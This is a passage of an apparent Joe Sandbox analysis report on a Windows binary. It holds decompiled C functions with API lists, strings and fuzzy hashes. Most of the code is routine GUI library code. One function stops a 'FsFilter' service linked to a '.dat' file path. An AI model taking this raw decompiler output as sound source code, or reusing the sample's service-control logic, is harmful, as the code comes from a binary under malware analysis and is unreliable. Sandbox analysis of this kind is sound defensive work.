											PlaySoundA("MenuPopup", 0, 0x12002);
											L17:
											 *0xe688b0 = 0;
											_t41 = 0;
										}
									}
								}
								Sleep(5);
								_t14 =  *0xe688b0; // 0xfffffffe
								__eflags = _t14 - 0xffffffff;
							} while (_t14 != 0xffffffff);
						}
						PlaySoundA(0, 0, 0x40);
						 *0xe8880c = 0;
						_pop(_t36);
						 *0xe688b0 = 0xfffffffe;
						_pop(_t42);
						E00DEBFE8(0);
						asm("int3");
						_t47 = _t49;
						E00DEBFE8(_v24);
						asm("int3");
						_push(_t47);
						_t32 = _v32;
						__eflags = _t32;
						if(__eflags == 0) {
							L30:
							_t16 = E00DE58BA(__eflags);
							_push(0x16);
							goto L31;
						} else {
							_t31 = _v4;
							__eflags = _t31;
							if(__eflags == 0) {
								goto L30;
							} else {
								_t44 = _v0;
								__eflags = _t44;
								if(_t44 != 0) {
									_t37 = _t32;
									_t45 = _t44 - _t32;
									__eflags = _t45;
									while(1) {
										_t19 =  *(_t37 + _t45) & 0x0000ffff;
										 *_t37 = _t19;
										_t37 =  &(_t37[0]);
										__eflags = _t19;
										if(_t19 == 0) {
											break;
										}
										_t31 = _t31 - 1;
										__eflags = _t31;
										if(_t31 != 0) {
											continue;
										}
										break;
									}
									__eflags = _t31;
									if(__eflags != 0) {
									} else {
										 *_t32 = 0;
										_t16 = E00DE58BA(__eflags);
										_push(0x22);
										L31:
										_pop(0);
										 *_t16 = 0;
										E00DE231A();
									}
								} else {
									__eflags = 0;
									 *_t32 = 0;
									goto L30;
								}
							}
						}
						return 0;
					}
				}
			}

0x00d8130b
0x00d81316
0x00d81395
0x00d81395
0x00d81318
0x00d8131f
0x00d81380
0x00d81383
0x00d81389
0x00d8138b
0x00d8138d
0x00d8138d
0x00000000
0x00d8138d
0x00d81321
0x00d81327
0x00000000
0x00d81329
0x00d81330
0x00d8133d
0x00d81348
0x00d81350
0x00d81357
0x00d8136f
0x00d8136f
0x00d8135e
0x00d81361
0x00d81367
0x00d81367
0x00d81377
0x00000000
0x00d8137d
0x00d81396
0x00d8139b
0x00d8139c
0x00d813a1
0x00d813a2
0x00d813a5
0x00d813a7
0x00d813aa
0x00d813ac
0x00d813b2
0x00d813b2
0x00d813b2
0x00d813b4
0x00d813e0
0x00d813e0
0x00000000
0x00d813b6
0x00d813b6
0x00d813b6
0x00d813b9
0x00d813c7
0x00000000
0x00d813bb
0x00d813bb
0x00d813be
0x00d813e1
0x00d813e1
0x00d813e7
0x00d813e9
0x00d813e9
0x00d813e9
0x00d813c0
0x00d813c7
0x00d813c7
0x00d813cd
0x00d813d3
0x00d813d3
0x00d813be
0x00d813b9
0x00d813f2
0x00d813f8
0x00d813fd
0x00d813fd
0x00d81402
0x00d81407
0x00d8140d
0x00d81413
0x00d81414
0x00d8141e
0x00dec11f
0x00dec124
0x00dec128
0x00dec12d
0x00dec132
0x00dec135
0x00dec138
0x00dec13c
0x00dec13e
0x00dec153
0x00dec153
0x00dec158
0x00000000
0x00dec140
0x00dec140
0x00dec143
0x00dec145
0x00000000
0x00dec147
0x00dec147
0x00dec14a
0x00dec14c
0x00dec168
0x00dec16a
0x00dec16a
0x00dec16c
0x00dec16c
0x00dec170
0x00dec173
0x00dec176
0x00dec179
0x00000000
0x00000000
0x00dec17b
0x00dec17b
0x00dec17e
0x00000000
0x00000000
0x00000000
0x00dec17e
0x00dec181
0x00dec183
0x00dec185
0x00dec187
0x00dec18a
0x00dec18f
0x00dec15a
0x00dec15a
0x00dec15b
0x00dec15d
0x00dec15d
0x00dec14e
0x00dec14e
0x00dec150
0x00000000
0x00dec150
0x00dec14c
0x00dec145
0x00dec166
0x00dec166
0x00d81327

APIs

EnterCriticalSection.KERNEL32(00E887F4,?,?,?,00CF6EB3,00000001), ref: 00D81330
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00D81361
LeaveCriticalSection.KERNEL32(00E887F4), ref: 00D81377
PlaySoundA.WINMM(MenuCommand,00000000,00012002,?,00E887F4,?,?,?,?,00CF6EB3,00000001), ref: 00D813C7
Sleep.KERNEL32(00000005,?,00E887F4,?,?,?,?,00CF6EB3,00000001), ref: 00D813F2
PlaySoundA.WINMM(00000000,00000000,00000040,00E887F4,?,?,?,?,00CF6EB3,00000001), ref: 00D81407

Strings

MenuCommand, xrefs: 00D813D9
MenuPopup, xrefs: 00D813C2

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalPlaySectionSound$EnterLeavePrioritySleepThread
String ID: MenuCommand$MenuPopup
API String ID: 2370138168-2036262055
Opcode ID: 9afb8f517e299aba5f82516e629259a14948e82c051d2950e39bd104a719c043
Instruction ID: fe272fb3f507b0b53b3a18da03ad1316c2fc69468b0ee16d40fcf02406607ec1
Opcode Fuzzy Hash: 9afb8f517e299aba5f82516e629259a14948e82c051d2950e39bd104a719c043
Instruction Fuzzy Hash: 6B31A3354042019FD2243B2BED48B6A76ACF7817B0FA44325F879B25E0CBB4484E8B60

Uniqueness

Uniqueness Score: -1.00%

Function 00CC27FD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CC27FD(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t13;
				struct HDC__* _t18;
				char* _t22;
				signed int _t28;
				void* _t30;
				intOrPtr _t31;
				struct HDC__* _t32;
				signed short _t33;
				signed int _t34;

				_t11 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t11 ^ _t34;
				_t33 = 0xa;
				_t31 = __ecx;
				_t22 = "System";
				_v72 = __ecx;
				_t13 = GetStockObject(0x11);
				if(_t13 != 0) {
					L2:
					if(GetObjectA(_t13, 0x3c,  &_v68) != 0) {
						_t22 =  &_v40;
						_t18 = GetDC(0);
						_t28 = _v68;
						_t32 = _t18;
						if(_t28 < 0) {
							_v68 =  ~_t28;
						}
						_t33 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t32);
						_t31 = _v72;
					}
					L6:
					_t15 = _a4;
					if(_a4 == 0) {
						_t15 = _t33 & 0x0000ffff;
					}
					return E00DDCBCE(E00CC2684(_t31, _t22, _t15), _t22, _v8 ^ _t34, _t30, _t31, _t33);
				}
				_t13 = GetStockObject(0xd);
				if(_t13 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00cc2803
0x00cc280a
0x00cc2812
0x00cc2813
0x00cc2815
0x00cc281c
0x00cc281f
0x00cc2827
0x00cc2835
0x00cc2844
0x00cc2848
0x00cc284b
0x00cc2851
0x00cc2854
0x00cc2858
0x00cc285c
0x00cc285c
0x00cc2877
0x00cc287a
0x00cc2880
0x00cc2880
0x00cc2883
0x00cc2883
0x00cc2889
0x00cc288b
0x00cc288b
0x00cc28a5
0x00cc28a5
0x00cc282b
0x00cc2833
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 00CC281F
GetStockObject.GDI32(0000000D), ref: 00CC282B
GetObjectA.GDI32(00000000,0000003C,?), ref: 00CC283C
GetDC.USER32(00000000), ref: 00CC284B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC2862
MulDiv.KERNEL32(?,00000048,00000000), ref: 00CC286E
ReleaseDC.USER32 ref: 00CC287A

Strings

System, xrefs: 00CC2815, 00CC288F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: f192507f03f8b2fcbb1ec03c3736f2ff0c3e1453483695878efeb081bd4341d8
Instruction ID: 9a016bed7ab1427fe848ea46f993c1bcff84fa7781cb67646766ea2a4918eff3
Opcode Fuzzy Hash: f192507f03f8b2fcbb1ec03c3736f2ff0c3e1453483695878efeb081bd4341d8
Instruction Fuzzy Hash: 1F111C72740215AFEB149F66DC49FBE77B8EB54B41F00402DFA45E62D0DA609D05D760

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2DE5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00CB2DE5(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4, long _a8) {
				void* __ebx;
				signed int _t11;
				void* _t24;
				struct HWND__* _t25;
				void* _t30;
				void* _t31;
				void* _t32;
				struct HWND__* _t33;
				void* _t35;

				_t32 = __edi;
				_t26 = __ecx;
				_t24 = __ecx;
				_t35 = E00CB2C35(__ecx, __ecx, __edx, __edi);
				_t11 = _a4 & 0x0000fff0;
				_t30 = _t11 - 0xf040;
				if(_t30 == 0) {
					L12:
					if(_a8 != 0x75 || _t35 == 0) {
						L16:
						return 0;
					} else {
						E00CB7A0A(_t24, _t35, _t30);
						L15:
						return 1;
					}
				}
				_t30 = _t30 - 0x10;
				if(_t30 == 0) {
					goto L12;
				}
				_t31 = _t30 - 0x10;
				if(_t31 == 0 || _t31 == 0) {
					if(_t11 == 0xf060 || _a8 != 0) {
						if(_t35 != 0) {
							_t25 =  *(_t24 + 0x20);
							_push(_t32);
							_t33 = GetFocus();
							E00CB277F(_t25, _t26, _t31, SetActiveWindow( *(_t35 + 0x20)));
							SendMessageA( *(_t35 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t25) != 0) {
								SetActiveWindow(_t25);
							}
							if(IsWindow(_t33) != 0) {
								SetFocus(_t33);
							}
						}
					}
					goto L15;
				} else {
					goto L16;
				}
			}

0x00cb2de5
0x00cb2de5
0x00cb2dea
0x00cb2df1
0x00cb2df6
0x00cb2dfd
0x00cb2e03
0x00cb2e7e
0x00cb2e83
0x00cb2e95
0x00000000
0x00cb2e89
0x00cb2e8b
0x00cb2e90
0x00000000
0x00cb2e92
0x00cb2e83
0x00cb2e05
0x00cb2e08
0x00000000
0x00000000
0x00cb2e0a
0x00cb2e0d
0x00cb2e1c
0x00cb2e26
0x00cb2e28
0x00cb2e2b
0x00cb2e35
0x00cb2e3e
0x00cb2e51
0x00cb2e60
0x00cb2e63
0x00cb2e63
0x00cb2e72
0x00cb2e75
0x00cb2e75
0x00cb2e7b
0x00cb2e26
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 00CB2E2C
SetActiveWindow.USER32(?), ref: 00CB2E37
SendMessageA.USER32(?,00000112,?,?), ref: 00CB2E51
IsWindow.USER32(?), ref: 00CB2E58
SetActiveWindow.USER32(?), ref: 00CB2E63
IsWindow.USER32(00000000), ref: 00CB2E6A
SetFocus.USER32(00000000), ref: 00CB2E75

Strings

u, xrefs: 00CB2E7E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 392042a0cbb54626e483788fafff36d76eabc1fc31dc0d410d24812b182166a1
Instruction ID: de1a08be4b83772485f9b899061479be1dab54d6c474b1f73d33cb4c710a0faf
Opcode Fuzzy Hash: 392042a0cbb54626e483788fafff36d76eabc1fc31dc0d410d24812b182166a1
Instruction Fuzzy Hash: 1611C4321146446FDB222F7BCC4CAFE3BA9EB48703F048825F991950A9DB38CE04E750

Uniqueness

Uniqueness Score: -1.00%

Function 00CA8FFC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CA8FFC() {
				signed int _v8;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				char* _t15;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				signed int _t24;

				_t5 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t5 ^ _t24;
				_t15 = 0;
				_t20 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t20 != 0) {
					_push(_t21);
					_t22 = OpenServiceA(_t20, "FsFilter", 0xf01ff);
					if(_t22 != 0) {
						if(ControlService(_t22, 1,  &_v36) != 0 || _v32 == 1) {
							_t15 = 1;
						}
						CloseServiceHandle(_t22);
						CloseServiceHandle(_t20);
						_t7 = _t15;
					} else {
						CloseServiceHandle(_t20);
						_t7 = 0;
					}
					_pop(_t21);
				}
				return E00DDCBCE(_t7, _t15, _v8 ^ _t24, _t19, _t20, _t21);
			}

0x00ca9002
0x00ca9009
0x00ca9013
0x00ca901d
0x00ca9021
0x00ca9023
0x00ca9035
0x00ca9039
0x00ca9055
0x00ca905f
0x00ca905f
0x00ca9067
0x00ca906a
0x00ca906c
0x00ca903b
0x00ca903c
0x00ca9042
0x00ca9042
0x00ca906e
0x00ca906e
0x00ca907c

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA9017
OpenServiceA.ADVAPI32(00000000,FsFilter,000F01FF,C:\DownLoad-Helper\x64_FsFilter.dat,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA902F
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA903C
ControlService.ADVAPI32(00000000,00000001,?,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA904D
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA9067
CloseServiceHandle.ADVAPI32(00000000,?,?,00CA7D99,00000060,00CA7DF1,00CA7EF7,0000001C,00CA654A,?,?,000000FF), ref: 00CA906A

Strings

C:\DownLoad-Helper\x64_FsFilter.dat, xrefs: 00CA9023
FsFilter, xrefs: 00CA9029

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: C:\DownLoad-Helper\x64_FsFilter.dat$FsFilter
API String ID: 221034970-2958689618
Opcode ID: 02620718c54bb8245f70cfb4217b8ce42b25e56af11d3780eb446b26aa087e6f
Instruction ID: 98e59e2cb9176b72bdde63d20f28edd4b9a323cad72c90c1778b9d8655fac673
Opcode Fuzzy Hash: 02620718c54bb8245f70cfb4217b8ce42b25e56af11d3780eb446b26aa087e6f
Instruction Fuzzy Hash: 8201D430644319AF9B205F769D869BF37BCEB4EB98700002AF511A2240DFB08E099660

Uniqueness

Uniqueness Score: -1.00%

Function 00D86232 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00D86232(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t21;
				intOrPtr _t23;
				void* _t24;
				void* _t25;

				_t25 = __eflags;
				_t19 = __ecx;
				_push(4);
				E00DDD52C(0xe1150b, __ebx, __edi, __esi);
				_t23 = __ecx;
				 *((intOrPtr*)(_t24 - 0x10)) = __ecx;
				E00CAFE92(__ecx, _t25);
				 *((intOrPtr*)(__ecx)) = 0xe2fcb8;
				 *((intOrPtr*)(__ecx + 0x34)) = 0xe2fc90;
				 *((intOrPtr*)(_t24 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0xffff;
				E00CB7DC9(__ecx, __edi, __ecx, 4);
				if( *0xe88834 == 0) {
					_t21 = "windows";
					 *0xe88828 = GetProfileIntA(_t21, "DragScrollInset", 0xb);
					 *0xe8882c = GetProfileIntA(_t21, "DragScrollDelay", 0x32);
					 *0xe88830 = GetProfileIntA(_t21, "DragScrollInterval", 0x32);
					 *0xe88834 = 1;
				}
				E00CB7E3D(_t19, 4);
				return E00DDD4FA(_t23);
			}

0x00d86232
0x00d86232
0x00d86232
0x00d86239
0x00d8623e
0x00d86240
0x00d86243
0x00d8624a
0x00d86250
0x00d86259
0x00d8625c
0x00d8625f
0x00d86262
0x00d86269
0x00d86275
0x00d8627e
0x00d86292
0x00d862a5
0x00d862b0
0x00d862b5
0x00d862b5
0x00d862c1
0x00d862cd

APIs

__EH_prolog3.LIBCMT ref: 00D86239

Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00E86E80,00000001,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7), ref: 00CB7DFA
Part of subcall function 00CB7DC9: InitializeCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E10
Part of subcall function 00CB7DC9: LeaveCriticalSection.KERNEL32(00E86E80,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E1E
Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E2B

GetProfileIntA.KERNEL32 ref: 00D86284
GetProfileIntA.KERNEL32 ref: 00D86297
GetProfileIntA.KERNEL32 ref: 00D862AA

Strings

windows, xrefs: 00D8627E, 00D86283, 00D86291, 00D862A4
DragScrollInterval, xrefs: 00D8629F
DragScrollInset, xrefs: 00D86279
DragScrollDelay, xrefs: 00D8628C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
API String ID: 4229786687-1024936294
Opcode ID: 8bd83d4167d79fb1bc4b6cc919d0af335e9d2073065faefa90dc24bc74787476
Instruction ID: 51b805b93ffd2d406601269a28343f476cee34d18827a9e8cae4d3f9582930b6
Opcode Fuzzy Hash: 8bd83d4167d79fb1bc4b6cc919d0af335e9d2073065faefa90dc24bc74787476
Instruction Fuzzy Hash: A0018FB09803109FCB64EF75ED46B5A7AF0AB58B00FC0193DF649F62A1DBB44449CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00CCAE6A Relevance: 13.9, APIs: 9, Instructions: 358
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00CCAE6A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t148;
				int _t151;
				char _t159;
				long _t164;
				void* _t169;
				void* _t175;
				void* _t176;
				intOrPtr* _t179;
				void* _t181;
				void* _t186;
				intOrPtr* _t187;
				long _t193;
				char _t194;
				long _t195;
				void* _t207;
				void* _t208;
				void* _t212;
				void* _t217;
				void* _t218;
				long _t220;
				void* _t221;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t233;
				long _t234;
				intOrPtr _t239;
				long _t243;
				void* _t278;
				long _t279;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				intOrPtr* _t286;
				void* _t288;
				intOrPtr _t289;
				void* _t290;
				long _t291;
				void* _t293;
				long _t294;
				intOrPtr _t295;
				long _t296;
				void* _t298;

				_push(0x2c);
				E00DDD52C(0xe09867, __ebx, __edi, __esi);
				_t282 = __ecx;
				 *((intOrPtr*)(_t298 - 0x2c)) = __ecx;
				SendMessageA( *(__ecx + 0x20), 0xb0, _t298 - 0x28, _t298 - 0x24);
				E00CCAB29(_t282, _t298 - 0x1c, _t298 - 0x14,  *(_t298 - 0x28), 1);
				_t288 =  *(_t298 - 0x28);
				_t278 =  *(_t298 - 0x24);
				 *(_t298 - 0x20) = _t288;
				if(_t288 >= 0 || _t278 <=  *((intOrPtr*)( *((intOrPtr*)(_t282 + 0x80)) - 0xc))) {
					_t148 =  *(_t298 - 0x1c);
					if(_t288 < _t148) {
						goto L46;
					} else {
						_t239 =  *((intOrPtr*)(_t298 - 0x14));
						if(_t288 > _t239 || _t278 < _t148 || _t278 > _t239) {
							goto L46;
						} else {
							if(_t288 != _t278) {
								__eflags =  *( *((intOrPtr*)(_t282 + 0x88)) - 0xc);
								if(__eflags == 0) {
									SendMessageA( *(_t282 + 0x20), 0xb0, _t298 - 0x38, _t298 - 0x20);
									E00CB236A(0, _t282, __eflags);
									_push( *(_t298 - 0x20));
									_push( *(_t298 - 0x38));
									goto L31;
								} else {
									 *(_t298 - 0x18) = 1;
									 *(_t298 - 0x34) = _t282 + 0x84;
									_t159 = E00CAAF63(_t282 + 0x84, _t288);
									_t283 =  *(_t298 - 0x34);
									_t229 = _t288 + 1;
									_t289 =  *((intOrPtr*)(_t298 - 0x14));
									 *((char*)(_t298 - 0xd)) = _t159;
									while(1) {
										__eflags = _t229 - _t289;
										if(_t229 >= _t289) {
											break;
										}
										_t186 = E00CAAF63(_t283, _t229);
										__eflags = _t186 -  *((intOrPtr*)(_t298 - 0xd));
										if(_t186 ==  *((intOrPtr*)(_t298 - 0xd))) {
											_t229 = _t229 + 1;
											 *(_t298 - 0x18) =  *(_t298 - 0x18) + 1;
											continue;
										}
										break;
									}
									_t243 =  *(_t298 - 0x18);
									_t282 =  *((intOrPtr*)(_t298 - 0x2c));
									_t290 =  *(_t298 - 0x20);
									_t230 = 0;
									__eflags =  *(_t298 - 0x24) -  *(_t298 - 0x28) - _t243;
									if( *(_t298 - 0x24) -  *(_t298 - 0x28) <= _t243) {
										 *(_t298 - 0x30) = _t282 + 0x80;
										E00CA7B78(_t282 + 0x80, _t298 - 0x1c, _t290, _t243);
										_t164 =  *(_t298 - 0x18);
										 *((intOrPtr*)(_t298 - 4)) = 2;
										__eflags = _t164;
										if(_t164 > 0) {
											_t293 =  *(_t298 - 0x24) -  *(_t298 - 0x28);
											__eflags = _t164 - _t293;
											_t175 = E00CA921F(_t298 - 0x1c, _t298 - 0x34, _t164 - _t293);
											 *((char*)(_t298 - 4)) = 3;
											_t176 = E00CA68A8(_t298 - 0x1c, _t175);
											 *((char*)(_t298 - 4)) = 2;
											E00CA2975(_t176,  *(_t298 - 0x34) - 0x10);
											_push(_t293);
											_push( *(_t282 + 0x8c) & 0x000000ff);
											_t179 = E00CCA7D9(_t230, _t298 - 0x34, _t282, _t293, __eflags);
											 *((char*)(_t298 - 4)) = 4;
											_push( *((intOrPtr*)( *_t179 - 0xc)));
											_t181 = E00CA93E8(_t230, _t298 - 0x1c, _t282,  *_t179);
											 *((char*)(_t298 - 4)) = 2;
											E00CA2975(_t181,  *(_t298 - 0x34) - 0x10);
											_t290 =  *(_t298 - 0x20);
											_t164 =  *(_t298 - 0x18);
										}
										E00CCC671(_t282, _t290, _t164 + _t290, _t230);
										_t291 =  *(_t298 - 0x1c);
										SendMessageA( *(_t282 + 0x20), 0xc2, 1, _t291);
										_t169 = E00CCC671(_t282,  *(_t298 - 0x20),  *(_t298 - 0x20), _t230);
										__eflags =  *((intOrPtr*)(_t291 - 0xc)) - _t230;
										if( *((intOrPtr*)(_t291 - 0xc)) > _t230) {
											_t284 =  *(_t298 - 0x20);
											do {
												_t169 = E00CBFBBF(_t230,  *(_t298 - 0x30), _t284, _t291, _t230 + _t284, E00CAAF63(_t298 - 0x1c, _t230) & 0x000000ff);
												_t230 = _t230 + 1;
												__eflags = _t230 -  *((intOrPtr*)(_t291 - 0xc));
											} while (_t230 <  *((intOrPtr*)(_t291 - 0xc)));
										}
										goto L44;
									} else {
										MessageBeep(0xffffffff);
										_push(_t230);
										_push( *(_t298 - 0x18) + _t290);
										_push(_t290);
										goto L47;
									}
								}
							} else {
								_t187 = _t282 + 0x84;
								 *(_t298 - 0x20) = _t187;
								if( *((intOrPtr*)( *_t187 - 0xc)) == 0) {
									SendMessageA( *(_t282 + 0x20), 0xb0, _t298 - 0x30, _t298 - 0x34);
									E00CB236A(0, _t282, __eflags);
									_push( *(_t298 - 0x34));
									_push( *(_t298 - 0x30));
									L31:
									_push(1);
									_t151 = E00CCA9DE(0, _t282, _t282, _t288, __eflags);
								} else {
									_t193 =  *(_t298 - 0x1c);
									if(_t278 != _t193) {
										_t285 =  *(_t298 - 0x20);
										_t294 = _t288 - 1;
										__eflags = _t294;
										 *(_t298 - 0x18) = 1;
										 *(_t298 - 0x1c) = _t294;
										_t194 = E00CAAF63( *(_t298 - 0x20), _t294);
										_t231 = _t294 + 1;
										 *((char*)(_t298 - 0xd)) = _t194;
										_t295 =  *((intOrPtr*)(_t298 - 0x14));
										while(1) {
											__eflags = _t231 - _t295;
											if(_t231 >= _t295) {
												break;
											}
											_t221 = E00CAAF63(_t285, _t231);
											__eflags = _t221 -  *((intOrPtr*)(_t298 - 0xd));
											if(_t221 ==  *((intOrPtr*)(_t298 - 0xd))) {
												_t231 = _t231 + 1;
												 *(_t298 - 0x18) =  *(_t298 - 0x18) + 1;
												continue;
											}
											break;
										}
										_t286 =  *((intOrPtr*)(_t298 - 0x2c));
										_t195 =  *(_t298 - 0x1c);
										_t279 = _t195;
										_t233 =  *(_t298 - 0x18) + _t195;
										 *(_t298 - 0x20) = _t195;
										_t262 = _t286 + 0x80;
										 *(_t298 - 0x30) = _t233;
										__eflags = _t233 - _t295;
										 *(_t298 - 0x34) = _t286 + 0x80;
										_t234 = 0;
										if(_t233 >= _t295) {
											L24:
											_t296 =  *(_t298 - 0x18);
											E00CA7B78(_t262, _t298 - 0x18, _t195, _t296);
											 *((intOrPtr*)(_t298 - 4)) = _t234;
											__eflags = _t296;
											if(_t296 > 0) {
												_t207 = E00CA921F(_t298 - 0x18, _t298 - 0x2c, _t296 - 1);
												 *((char*)(_t298 - 4)) = 1;
